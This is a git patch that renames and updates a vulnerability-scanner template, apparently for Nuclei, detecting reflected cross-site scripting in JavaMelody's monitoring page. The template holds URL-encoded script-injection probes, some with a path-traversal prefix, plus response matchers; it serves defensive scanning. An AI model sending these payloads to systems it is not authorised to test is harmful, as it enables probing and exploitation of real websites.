From e5b30f69d1cb277c16ffcab7eacd71f49a7b51f6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 24 Jan 2022 13:15:23 +0530 Subject: [PATCH] Update and rename vulnerabilities/JavaMelody/java-melody-xss.yaml to vulnerabilities/other/java-melody-xss.yaml --- .../{JavaMelody => other}/java-melody-xss.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename vulnerabilities/{JavaMelody => other}/java-melody-xss.yaml (54%) diff --git a/vulnerabilities/JavaMelody/java-melody-xss.yaml b/vulnerabilities/other/java-melody-xss.yaml similarity index 54% rename from vulnerabilities/JavaMelody/java-melody-xss.yaml rename to vulnerabilities/other/java-melody-xss.yaml index 69c6036322..3899625c59 100644 --- a/vulnerabilities/JavaMelody/java-melody-xss.yaml +++ b/vulnerabilities/other/java-melody-xss.yaml @@ -1,4 +1,4 @@ -id: java-melody-reflected-xss +id: java-melody-xss info: name: JavaMelody Monitoring XSS @@ -6,26 +6,26 @@ info: severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. reference: - - https://github.com/javamelody/javamelody/pull/555 - https://github.com/Hurdano/JavaMelody-XSS + - https://github.com/javamelody/javamelody/pull/555 tags: xss,javamelody requests: - method: GET path: - - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2fscript%3E%3Cscript%3Ealert(31337.37)%3C/script%3E' - - '{{BaseURL}}/..%3B/monitoring?part=graph&graph=usedMemory%3C%2fscript%3E%3Cscript%3Ealert(31337.37)%3C/script%3E' - - '{{BaseURL}}/monitoring?action=clear_counter&counter=%3Cscript%3Ealert(31337.37)%3C/script%3E' - - '{{BaseURL}}/..%3B/monitoring?action=clear_counter&counter=%3Cscript%3Ealert(31337.37)%3C/script%3E' + - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(31337.37)' + - '' + - type: word + part: header words: - - 'JavaMelody' + - text/html + - type: status status: - 200